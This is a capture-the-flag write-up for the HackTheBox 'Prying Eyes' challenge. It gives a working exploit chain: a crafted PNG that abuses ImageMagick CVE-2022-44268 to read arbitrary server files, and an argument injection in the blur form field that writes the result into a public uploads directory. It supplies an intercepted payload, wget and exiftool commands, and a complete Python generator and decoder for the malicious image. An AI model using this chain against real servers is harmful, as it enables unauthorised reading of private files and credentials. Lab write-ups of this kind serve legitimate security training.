https://app.hackthebox.com/challenges/459

Description

Welcome to the Prying Eyes, a “safe space” for those curious about the large organisations that dominate our life. How safe is the site really?

Exploitation

Generate a PNG carrying a tEXt chunk with the keyword profile whose text is the path of the file to read; the ImageMagick versions affected by CVE-2022-44268 load that path as an image profile when they process the upload, so the file contents end up inside the converted image:

wget https://raw.githubusercontent.com/Sybil-Scan/imagemagick-lfi-poc/refs/heads/main/generate.py
python generate.py -f '/home/node/app/flag.txt' -o exploit.png

Register, log in and create a new post with exploit.png attached. Intercept the upload request in Burp Suite and add the part below to the multipart body, reusing the request's own boundary (121759579010930786621073729912 in this capture). The blur value is interpolated into the ImageMagick command line without sanitisation, so `-write uploads/hi.png` makes ImageMagick save the converted image, flag profile included, into the web-accessible uploads directory:

-----------------------------121759579010930786621073729912
Content-Disposition: form-data; name="blur"

1 -write uploads/hi.png ; echo

After the upload, fetch the written image. The contents of flag.txt are stored in it as a hex-encoded "Raw profile type" text chunk, so exiftool dumps the chunk and xxd turns the hex back into bytes:

wget http://94.237.51.1:35160/uploads/hi.png
exiftool -b hi.png
exiftool -b hi.png 2>/dev/null | grep -Eo '[0-9a-fA-F]{40,}' | xxd -r -p
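As an added example, not the PoC's generate.py or anything from the challenge itself, the following Python reproduces both ends of the procedure above: build_lfi_png builds the same kind of payload PNG (a valid image plus a tEXt chunk whose keyword is profile and whose text is the target path), and extract_raw_profiles pulls the file bytes back out of the "Raw profile type" chunk that ImageMagick writes, replacing the exiftool/grep/xxd pipeline and checking the declared length instead of trusting a regex match. fake_server_output is a constructed stand-in for the hi.png the server produces; the exact line layout of the raw-profile text and the 128-byte tEXt/zTXt threshold are assumptions about ImageMagick's output format, and the decoder does not depend on them.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Assumption about ImageMagick: raw-profile text shorter than this goes in tEXt, else zTXt.
ZTXT_THRESHOLD = 128


def png_chunk(chunk_type: bytes, data: bytes) -> bytes:
    """Serialise one chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def iter_chunks(png: bytes):
    """Yield (type, data) for each chunk, checking the signature and every CRC."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"CRC mismatch in {ctype!r} chunk")
        yield ctype, data
        pos += 12 + length


def build_lfi_png(target_path: str) -> bytes:
    """Valid 1x1 grayscale PNG plus a tEXt chunk whose keyword is 'profile'.
    Affected ImageMagick versions (CVE-2022-44268) treat that text as a path,
    read the file and attach its bytes to the image as a profile."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit, grayscale
    idat = zlib.compress(b"\x00\x00")  # filter type 0 + one pixel
    text = b"profile\x00" + target_path.encode()
    return (PNG_SIGNATURE + png_chunk(b"IHDR", ihdr) + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def encode_raw_profile(name: str, payload: bytes) -> bytes:
    """Text body in ImageMagick's raw-profile layout (assumed): newline, name,
    newline, 8-wide decimal length, then the hex in 72-character lines."""
    hexed = payload.hex()
    parts = [f"\n{name}\n{len(payload):8d}"]
    parts += ["\n" + hexed[i:i + 72] for i in range(0, len(hexed), 72)]
    return "".join(parts).encode()


def fake_server_output(profiles: dict) -> bytes:
    """Constructed stand-in for the hi.png the server writes: a 1x1 image that
    carries each {name: bytes} as a 'Raw profile type <name>' text chunk."""
    chunks = [png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))]
    for name, payload in profiles.items():
        keyword = f"Raw profile type {name}".encode() + b"\x00"
        body = encode_raw_profile(name, payload)
        if len(body) < ZTXT_THRESHOLD:
            chunks.append(png_chunk(b"tEXt", keyword + body))
        else:  # zTXt layout: keyword, NUL, compression method 0, zlib stream
            chunks.append(png_chunk(b"zTXt", keyword + b"\x00" + zlib.compress(body)))
    chunks += [png_chunk(b"IDAT", zlib.compress(b"\x00\x00")), png_chunk(b"IEND", b"")]
    return PNG_SIGNATURE + b"".join(chunks)


def decode_raw_profile(text: bytes) -> bytes:
    """Reverse of encode_raw_profile; the declared length guards against a
    truncated or partially matched hex run."""
    lines = [ln for ln in text.decode("latin-1").split("\n") if ln.strip()]
    if len(lines) < 2:
        raise ValueError("raw profile text too short")
    declared = int(lines[1])
    data = bytes.fromhex("".join(lines[2:]))
    if len(data) != declared:
        raise ValueError(f"declared {declared} bytes, decoded {len(data)}")
    return data


def extract_raw_profiles(png: bytes) -> dict:
    """Map every 'Raw profile type ...' keyword (tEXt or zTXt) to the bytes it carries."""
    found = {}
    for ctype, data in iter_chunks(png):
        if ctype not in (b"tEXt", b"zTXt"):
            continue
        keyword, _, rest = data.partition(b"\x00")
        if not keyword.startswith(b"Raw profile type"):
            continue
        if ctype == b"zTXt":
            rest = zlib.decompress(rest[1:])  # drop the compression-method byte
        found[keyword.decode("latin-1")] = decode_raw_profile(rest)
    return found


if __name__ == "__main__":
    with open("exploit.png", "wb") as fh:
        fh.write(build_lfi_png("/home/node/app/flag.txt"))
    sample = fake_server_output({"txt": b"HTB{constructed_sample}"})  # stands in for hi.png
    for key, content in extract_raw_profiles(sample).items():
        print(key, "->", content.decode())
```

Running the script writes exploit.png next to it; to decode the real result, read the fetched hi.png and pass its bytes to extract_raw_profiles instead of the constructed sample.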

Summary

Prying Eyes: an ImageMagick arbitrary file read (the imagemagick-lfi-poc PNG, CVE-2022-44268) embeds /home/node/app/flag.txt in the processed image as a raw profile, and an injectable blur parameter lets us -write that image into the public uploads directory, where the flag is read back out of the image metadata.